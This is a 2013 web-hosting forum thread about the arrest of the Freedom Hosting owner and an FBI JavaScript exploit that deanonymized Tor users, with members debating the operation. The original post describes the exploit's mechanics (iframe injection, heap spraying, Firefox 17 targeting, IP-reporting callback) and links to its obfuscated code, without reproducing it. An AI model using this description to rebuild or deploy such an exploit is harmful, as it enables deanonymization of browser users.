Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Host Ultra / Freedom Hosting Owner Arrested
New on LowEndTalk? Please Register and read our Community Rules.

Host Ultra / Freedom Hosting Owner Arrested

Just saw this over at WHT. Looks like the owner of Host Ultra/Freedom Hosting has been arrested by the FBI, the TOR community happens to be affected by this massively...

BREAKING: HALF OF TOR SITES COMPROMISED, INCLUDING TORMAIL

The founder of Freedom Hosting has been arrested in Ireland and is awaiting extradition to USA.

In a crackdown that FBI claims to be about hunting down pedophiles, half of the onion sites in the TOR network has been compromised, including the e-mail counterpart of TOR deep web, TORmail.

http://www.independent.ie/irish-news/courts/fbi-bids-to-extradite-largest-childporn-dealer-on-planet-29469402.html

This is undoubtedly a big blow to the TOR community, Crypto Anarchists, and more generally, to Internet anonymity. All of this happening during DEFCON.

If you happen to use and account name and or password combinations that you have re used in the TOR deep web, change them NOW.

Eric Eoin Marques who was arrested runs a company called Host Ultra Limited.

http://www.solocheck.ie/Irish-Company/Host-Ultra-Limited-399806
http://www.hostultra.com/

He has an account at WebHosting Talk forums.

http://www.webhostingtalk.com/showthread.php?t=157698

A few days ago there were mass outages of Tor hidden services that predominantly effected Freedom Hosting websites.

http://postimg.org/image/ltj1j1j6v/

"Down for Maintenance
Sorry, This server is currently offline for maintenance. Please try again in a few hours."

If you saw this while browsing Tor you went to an onion hosted by Freedom Hosting. The javascript exploit was injected into your browser if you had javascript enabled.

What the exploit does:

The JavaScript zero-day exploit that creates a unique cookie and sends a request to a random server that basically fingerprints your browser in some way, which is probably then correlated somewhere else since the cookie doesn't get deleted. Presumably it reports the victim's IP back to the FBI.

An iframe is injected into FH-hosted sites:

TOR/FREEDOM HOST COMPORMISED
By: a guest on Aug 3rd, 2013
http://pastebin.com/pmGEj9bV

Which leads to this obfuscated code:

Javascript Mozilla Pastebin
Posted by Anonymous on Sun 4th Aug 02:52
http://pastebin.mozilla.org/2776374

FH STILL COMPROMISED
By: a guest on Aug 3rd, 2013
http://pastebin.com/K61QZpzb

FBI Hidden Service in connection with the JavaScript exploit:
7ydnpplko5lbgfx5

Who's affected Time scales:

Anyone who accessed an FH site in the past two days with JavaScript enabled. Eric Eoin Marques was arrested on Sunday so that's the earliest possible date.

"In this paper we expose flaws both in the design and implementation of Tor’s hidden services that allow an attacker to measure the popularity of arbitrary hidden services, take down hidden services and deanonymize hidden services
Trawling for Tor Hidden Services: Detection, Measurement, Deanonymization"

http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf

The FBI Ran a Child Porn Site for Two Whole Weeks
http://gizmodo.com/why-the-fbi-ran-a-child-porn-site-for-two-whole-weeks-510247728

http://postimg.org/image/o4qaep8pz/

On any other day one would say these sick perverts got what they deserved. Unfortunately the Feds are stepping far beyond just pedophiles in this latest issue.

The js inserted at Freedom Hosting? Nothing really, just an iframe inject script with a UUID embedded server-side.

The iframe then delivers an exploit kit that appears to be a JavaScript 0day leading to...something. It only attempts to exploit Firefox (17 and up) on Windows NT. There's definitely some heap spraying and some possible shell code. The suspect shell code block contains some strings that look to formulate an HTTP request, but I haven't been able to collect the final payload yet. The shell code also contains the UUID with which the exploit was delivered. Any UUID will work to get this part of the exploit.

I'm still pulling this little bundle of malware apart. So far, I've got that the attack is split across three separate files, each loaded into an iframe. Calls are made between the frames to further obfuscate the control flow. The 'content_2.html' and 'content_3.html' files are only served up if the request "looks like" Firefox and has a correct Referer header. The 'content_2.html' is loaded from the main exploit iframe and in turn loads 'content_3.html'.

Short version. Preliminary analysis: This little thing probably CAN reach out without going through Tor. It appears to be exploiting the JavaScript runtime in Firefox to download something.

UPDATE: The exploit only affects Firefox 17 and involves several JS heap-sprays. Note that the current Extended Support Release is Firefox 17, so this may also affect some large organizations using Firefox ESR.

http://pastebin.mozilla.org/2777139

The script will only attempt the exploit on Firefox 17, so I'm no longer worried about it being some new 0day. Enough of the "Critical" MFSAs are for various sorts of memory corruption that I don't have the time to find out if this is actually a new exploit or something seen before.

http://postimg.org/image/mb66vvjsh/

Logical outcomes from this?

  1. FBI/NSA just shut down the #1 biggest hosting site and #1 most wanted person on Tor

  2. Silkroad is next on their list, being the #2 most wanted (#1 was Child Porn, #2 is drugs)

  3. Bitcoin and all crypto currenecies set to absolutely CRASH as a result since the feds can not completely control this currency as they please.

I don't always call the Feds agenda transparent, but when i do, I say they can be trying harder.

http://www.twitlonger.com/show/n_1rlo0uu

Personally I'm disgusted to see the owner is allow hosting this content on his network, but at the same time its scary to see what the FBI can do and how they caught these guys... looks like if you were browsing with Tor and you went to something that was hosted by Freedom Hosting, the FBI was able to use an exploit that was injected to your browser if you had javascript enabled. "The JavaScript zero-day exploit that creates a unique cookie and sends a request to a random server that basically fingerprints your browser in some way, which is probably then correlated somewhere else since the cookie doesn't get deleted. Presumably it reports the victim's IP back to the FBI."

Very interesting indeed.

Comments

  • perennateperennate Member, Provider

    That's supposed to be breaking news?

  • @perennate said:
    That's supposed to be breaking news?

    Is it old news?

  • Thanked by 1perennate
  • perennateperennate Member, Provider
    edited September 2013

    34 days old. See the thread that @jake "just saw".

  • jarjar Provider
    edited September 2013

    I can't reasonably believe that he didn't know that he was hosting child porn, and for that I'd say good. However, others shouldn't have to pay the price for pedophiles and their enablers. You can't stop humans from doing things you don't like, so there's no point in setting the world on fire and killing us all just to flush them out. That extreme sentence illustrates that there IS such a thing as "too far, no longer justified by the cause." I do think they went too far in this operation.

    Founder @ MXroute

  • MaouniqueMaounique Member
    edited September 2013

    For people that do not know how to protect from this kind of attack:
    1. Route all traffic over Tor, best way is to use a VM an the gateway for it be a router which only goes over Tor;
    2. You do not need a host to have your underground site, you can host it at home. Besides, Tor is made for anonymizing traffic, not for hosting hidden content, that can be done very well with other means. Same goes for mail;
    3. The child porn story was always used as a cover up, so nothing new there. Perhaps they sometimes add a terrorism colouring over it, but it is so obvious for everyone that cp addicts are not into religion too that it was ludicrous and lately only the CP was used, perhaps they will add the drugs colouring too, that makes a bit more sense.

    Extremist conservative user, I wish to preserve human and civil rights, free speech, freedom of the press and worship, rule of law, democracy, peace and prosperity, social mobility, etc. Now you can draw your guns.

  • perennateperennate Member, Provider

    You shouldn't use a anonymous hosting provider, seems to be like that defeats half the point.

  • @perennate said:
    34 days old. See the thread that jake "just saw".

    In that sense any news is old news the moment it's posted. There's always something newer.

    TOR and Bitcoin are sure taking the toll.

    Serving you the best VPS, Web hosting, dedicated servers and more - Cloud Shards | Query Foundry
    We operate the network AS62638 | Available in Syd AU and Dallas, Los Angeles and NYC USA
  • Instead of spending all those money to raid bitcoin operators they could get by cheaper buying the entire stock and manipulating the market making some profit in the process. That wont be much more illegal than running a child porn site.

    Extremist conservative user, I wish to preserve human and civil rights, free speech, freedom of the press and worship, rule of law, democracy, peace and prosperity, social mobility, etc. Now you can draw your guns.

  • perennateperennate Member, Provider
    edited September 2013

    @concerto49 said:
    In that sense any news is old news the moment it's posted. There's always something newer.

    I mean this was posted already, a month ago on LET.

    Edit: hm, maybe it wasn't posted here. Was on vpsboard.com though. Confusing with the two sites... anyway a month old is much more than <1w old.

  • @perennate said:
    Edit: hm, maybe it wasn't posted here. Was on vpsboard.com though. Confusing with the two sites... anyway a month old is much more than <1w old.

    Agrees on that part. Jake seems to be reposting old news non-stop.

    Thanked by 1MannDude
    Serving you the best VPS, Web hosting, dedicated servers and more - Cloud Shards | Query Foundry
    We operate the network AS62638 | Available in Syd AU and Dallas, Los Angeles and NYC USA
  • @Maounique said:
    For people that do not know how to protect from this kind of attack:

    1. The child porn story was always used as a cover up, so nothing new there. Perhaps they sometimes add a terrorism colouring over it, but it is so obvious for everyone that cp addicts are not into religion too that it was ludicrous and lately only the CP was used, perhaps they will add the drugs colouring too, that makes a bit more sense.

    It's TOR, so it's not like child porn wasn't there. Don't be mad at the FBI over this, be mad at the horse's ass who willingly took money from people wanting to host child porn who also put his legitimate customers in jeopardy in the process.

    Contractually bound by a verbal non-disclosure agreement

  • There's no freedom of speech when it comes to child porn. Lock the guy up with other sexual offenders and see how he likes that.

    I'm really talented at telling SolusVM to reinstall my OS. I can help you do it, too, for absolutely fee.

Sign In or Register to comment.